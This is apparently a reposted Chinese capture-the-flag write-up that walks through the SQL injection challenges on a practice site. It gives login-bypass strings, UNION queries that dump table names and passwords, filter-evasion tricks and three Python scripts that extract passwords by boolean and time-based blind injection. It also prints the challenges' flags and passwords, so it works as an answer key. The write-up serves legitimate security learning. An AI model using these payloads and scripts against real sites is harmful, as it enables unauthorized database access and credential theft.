萌新福利—sql注入之旅

admin

原文链接：https://xz.aliyun.com/t/2298
前记

最近发现了一个有趣的练习网站~里面有大量web题目，其中sql注入的题目也是由浅入深，适合萌新入门
给出网站地址

1. https://ringzer0team.com

复制代码

Most basic SQLi pattern.(point 1)

签到题：

1. username: admin'#
   
2. password: 1

复制代码

可以得到flag：FLAG-238974289383274893

ACL rulezzz the world.(point 2)

随手测试

1. username=admin'

复制代码

得到

1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4
   

复制代码

随手闭合一下

1. username=admin' or 1#

复制代码

得到flag:FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

过滤了

1. #
   
2. --
   
3. =

复制代码

其他没测试，直接随手pass

1. username=admin' or 'a' like 'a&password=1
   

复制代码

即可拿到flag:FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

随手试了一下二次注入，发现有点不像
于是进行长度截断
注册

1. username=admin                                    1
   
2. password=1

复制代码

登录

1. username=admin
   
2. password=1

复制代码

得到flag:FLAG-0Kg64o8M9gPQfH45583Mc0jc3u

Just another login form(point 2)

尝试了一下无果，于是尝试联合注入

1. username = admin' union select md5(1),md5(1),md5(1)#
   
2. password = 1

复制代码

得到回显:Bad search filter
搜索发现是LDAP的特定错误
于是登录

1. username = *
   
2. password = *

复制代码

得到flag:FLAG-38i65201RR4B5g1oAm05fHO0QP
这是一个值得研究的点，默默记下了~最近的sql注入很少见，记得以前XCTF联赛中出现过~

Po po po po postgresql(point 2)

随手试试

1. username=admin' or 'a' like 'a&password=1
   

复制代码

回显

1. ERROR:  invalid input syntax for type boolean: "admin"
   
2. LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

复制代码

于是闭合

1. username=admin') or 'a' like 'a') -- &password=1
   

复制代码

得到flag:FLAG-mdeq68jNN88xLB1o2m8V33Ld

Don't mess with Noemie; she hates admin!(point 3)

尝试

1. username = admin' or sleep(5) or 'a' like 'a

复制代码

发现sleep成功
说明闭合有效
那么直接刚

1. username = admin' or 'a' like 'a
   

复制代码

发现登录失败
那么猜想后台语句

1. $sql = select * from users where username='$username' and password = '$password'
   

复制代码

所以我们尝试

1. username = 1' or 1 or '
   
2. password = 1

复制代码

带入即

1. select * from users where username='1' or 1 or '' and password = '1'
   

复制代码

即可成功绕过
得到flag:FLAG-Yk3Hfovvb5kALU9hI2545MaY

What's the definition of NULL(point 3)

看到url：?id=MQ==
明显是base64
解一下，发现是:id=1
随手测试

1. id = 1'#
   
2. id = MScj

复制代码

得到

1. SQLite Database error please try again later.
   

复制代码

然后自己测试了很久无果
回到起点，想起来他有描述

1. Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

复制代码

看来后台sql的确是这么写的

1. WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)
   

复制代码

构造

1. 0) OR (ID IS NULL) OR (1=2

复制代码

带入得:

1. WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)
   

复制代码

编码一下

1. ?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=
   

复制代码

得到flag：FLAG-sQFYzqfxbZhAj04NyCCV8tqA
这个题也挺有意思的，值得研究一下~

Login portal 2(point 3)

上去就尝试

1. username = 1' or 1 or '
   
2. password = 1

复制代码

毕竟老套路
回显

1. Wrong password for impossibletoguess.
   

复制代码

发现impossibletoguess很可疑
可能是个用户名，竟然回显了，那试试union

1. username = 1' union select 1,2#
   
2. password = 1

复制代码

回显

1. Wrong password for 1.
   

复制代码

剩下的就是联合注入了

1. 1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
   
2. Wrong password for users.
   
3. 1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
   
4. Wrong password for username,password.
   
5. 1' union select (select username from users limit 0,1),2#
   
6. Wrong password for impossibletoguess.
   
7. 1' union select (select password from users limit 0,1),2#
   
8. Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

复制代码

长度40的密码，显然不是md5，猜测为sha1
联合注入

1. username = impossibletoguess' union select sha1(1),sha1(1)#
   
2. password = 1

复制代码

登录成功，得到flag:FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

随手测试id

1. ?q=2'
   
2. No result found for id "2'"

复制代码

发现可以回显，尝试Union，发现空格被过滤，用%0a绕过

1. ?q=2%0aunion%0aselect%0a1,2#
   
2. Quote of the day: No one forgives with more grace and love than a child.
   
3. Quote of the day: 2
   

复制代码

然后老套路即可:

1. ?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(
   
2. TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
   
3. Quote of the day: No one forgives with more grace and love than a child.
   
4. Quote of the day: alkdjf4iu,quotes
   
5. ?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
   
6. Quote of the day: No one forgives with more grace and love than a child.
   
7. Quote of the day: id,flag
   
8. ?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
   
9. Quote of the day: No one forgives with more grace and love than a child.
   
10. Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

复制代码

over~

Thinking outside the box is the key(point 4)

随手尝试

1. ?id=2’

复制代码

得到

1. SQLite Database error please try again later.

复制代码

知道了是SQLite
继续测试

1. ?id=2 and 1=2 union select 1,2 from sqlite_master
   
2. 2
   
3. ?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
   
4. 3.8.7.1
   
5. ?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
   
6. random_stuff

复制代码

依次类推，得到所有表名

1. random_stuff
   
2. ajklshfajks
   
3. troll
   
4. aatroll

复制代码

我选择ajklshfajks
根据之前的经验，应该是flag字段了

1. ?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
   
2. FLAG-13lIBUTHNFLEprz2KKMx6yqV

复制代码

over~

No more hacking for me!(point 4)

好坑，f12源代码里有说明

1. <!-- l33t dev comment: -->
   
2. <!-- No more hacking attempt we implemented the MOST secure filter -->
   
3. <!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

复制代码

我说我为什么一直做不出来：(
发现这一点后就很容易了：

1. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 --
   
2. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 --
   
3. 
   
4. random_data  CREATE TABLE random_data (id int, message varchar(50), display int)
   
5. 
   
6. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

复制代码

即可得到flag

1. FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE

复制代码

Quote of the day reloaded(point 5)

感觉题目是不是有点脑洞？还是我没发现
尝试来尝试去，发现这样可以成功

1. ?q=3\&s=ununionion select 1,2%23
   
2. Quote of the day: Famous remarks are very seldom quoted correctly.
   
3. Quote of the day: 2
   

复制代码

union要双写绕过

1. ?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
   
2. Quote of the day: Famous remarks are very seldom quoted correctly.
   
3. Quote of the day: qdyk5,quotes
   
4. ?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
   
5. Quote of the day: Famous remarks are very seldom quoted correctly.
   
6. Quote of the day: id,flag
   
7. ?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
   
8. Quote of the day: Famous remarks are very seldom quoted correctly.
   
9. Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

复制代码

over~
(注：虽然做出来了，还是觉得摸不着头脑，感觉关联性不强啊，我也是随手试出来的= =)

Hot Single Mom(point 6)

看到描述

1. Get laid or get lazy it's up to you
   
2. Find online hot single Mom

复制代码

就知道不是什么正经题目，果然网站挂了(滑稽)
但是有说明题目来源:GoSecure CTF 2014
搜索了一下

1. https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

复制代码

应该是道不错的注入题目
有flag：FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

这题我用了盲注，但是目前为止这是第一道用盲注的题，所以不知道是不是做麻烦了~
脚本如下

1. import requests
   
2. import string
   
3. url = "https://ringzer0team.com/challenges/5"
   
4. cookie = {
   
5.     "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
   
6.     "_ga":"GA1.2.1724649637.1519735081",
   
7.     "_gid":"GA1.2.933125333.1519735081"
   
8. }
   
9. flag = ""
   
10. for i in range(1,1000):
    
11.     print "i:",i
    
12.     for j in range(33,127):
    
13.     #for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
    
14.         data = {
    
15.             #"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
    
16.             #"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
    
17.             #"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
    
18.             "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
    
19.             "password":"1" #SQL1nj3ct10nFTW
    
20.         }
    
21. 
    
22.         r = requests.post(data=data,url=url,cookies=cookie)
    
23.         if "Invalid username / password" in r.content:
    
24.             flag += chr(j)
    
25.             print flag
    
26.             break

复制代码

列名我没跑(滑稽脸)，毕竟知道了他的套路，猜测是password，一猜就中~~
最后得到密码

1. SQL1nj3ct10nFTW

复制代码

登录拿到flag：FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it's lite it's not necessarily easy(point 6)

随手测试

1. username = 1' or sleep(5) or 'a'='a
   
2. password = 1

复制代码

发现报错

1. SQLite Database error please try again later. Impossible to fetch username & password from users table
   

复制代码

这也省事了，直接把列名，表名都弄出来了
于是直接取password进行盲注即可

1. import requests
   
2. import string
   
3. url = "https://ringzer0team.com/challenges/19"
   
4. cookie = {
   
5.     "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
   
6.     "_ga":"GA1.2.1724649637.1519735081",
   
7.     "_gid":"GA1.2.933125333.1519735081"
   
8. }
   
9. flag = ""
   
10. for i in range(1,1000):
    
11.     print "i:",i
    
12.     for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
    
13.         data = {
    
14.             "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
    
15.             "password":"1" #4dm1nzP455
    
16.         }
    
17. 
    
18.         r = requests.post(data=data,url=url,cookies=cookie)
    
19.         if "Invalid username / password" in r.content:
    
20.             flag += j
    
21.             print flag
    
22.             break
    

复制代码

得到密码

1. 4dm1nzP455
   

复制代码

登录拿到flag:FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

疯狂测试后得到payload:

1. /?s = 1'<0e0union select 1,2,3#
   

复制代码

然后老套路即可

1. ?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
   
2. iaas
   
3. ?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
   
4. iaas
   
5. rz_flag
   
6. ?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
   
7. flag
   
8. ?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
   
9. FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

复制代码

over~~

Login portal 4(point 7)

这题用了时间盲注
脚本如下

1. import requests
   
2. url = "https://ringzer0team.com/challenges/6"
   
3. cookie = {
   
4.     "PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
   
5.     "_ga":"GA1.2.1724649637.1519735081",
   
6.     "_gid":"GA1.2.933125333.1519735081",
   
7.     "_gat":"1"
   
8. }
   
9. flag = ""
   
10. for i in range(1,1000):
    
11.     for j in range(33,127):
    
12.         print "i:", i,"j:",j
    
13.         data = {
    
14.             "username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
    
15.             "password":"1"
    
16.         }
    
17.         try:
    
18.             r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
    
19.         except:
    
20.             flag += chr(j)
    
21.             print flag
    
22.             break

复制代码

得到密码：

1. UrASQLi1337!

复制代码

登录后拿到flag

1. FLAG-70ygerntbicjdzrxmm0rmk0xx2

复制代码

后记

本人算是抛砖引玉啦~由于能力有限，只能给出大部分题目题解，还有一些有趣的题目待大家继续深挖啦~期待与各位大师傅的套路~Orz